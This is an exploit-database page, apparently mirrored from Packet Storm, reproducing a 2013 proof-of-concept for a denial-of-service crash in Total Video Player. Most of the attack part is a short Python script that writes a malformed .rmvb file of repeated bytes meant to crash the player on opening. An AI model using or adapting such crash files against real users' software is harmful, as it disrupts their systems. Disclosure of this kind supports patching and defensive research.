Lucene search
K

Total Video Player Denial Of Service

🗓️ 01 Jan 2014 00:00:00Reported by JoKeR_StExType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Total Video Player Denial Of Service exploi

Code
`#####################################################################################################  
# Total Video Player (.rmvb) Local Crash P.O.C  
#####################################################################################################  
# Date : 31/12/2013  
# Author : JoKeR_StEx  
# Software Download link : http://od.ccm2.net/www.commentcamarche.net/download/files/cnet_tvcc131_exe  
# Tested 0N : WINDOWS XP SP3   
#####################################################################################################  
  
#!/usr/bin/python   
  
# Crash   
buffer = "\x46\x48" * 2014 # FK #   
# File .rmvb  
filename = "2014.rmvb"   
crash = buffer  
file=open(filename,"w")  
file.write(crash)  
file.close()  
if file:  
print"File Created successfully ^__^"  
else:   
print" Err0r :/ ..."  
  
############################ <3 Happy New Year <3 #####################################################  
# The Black Devils  
# Dz Crazy L33ts  
########################### <3 Happy New Year <3 ######################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation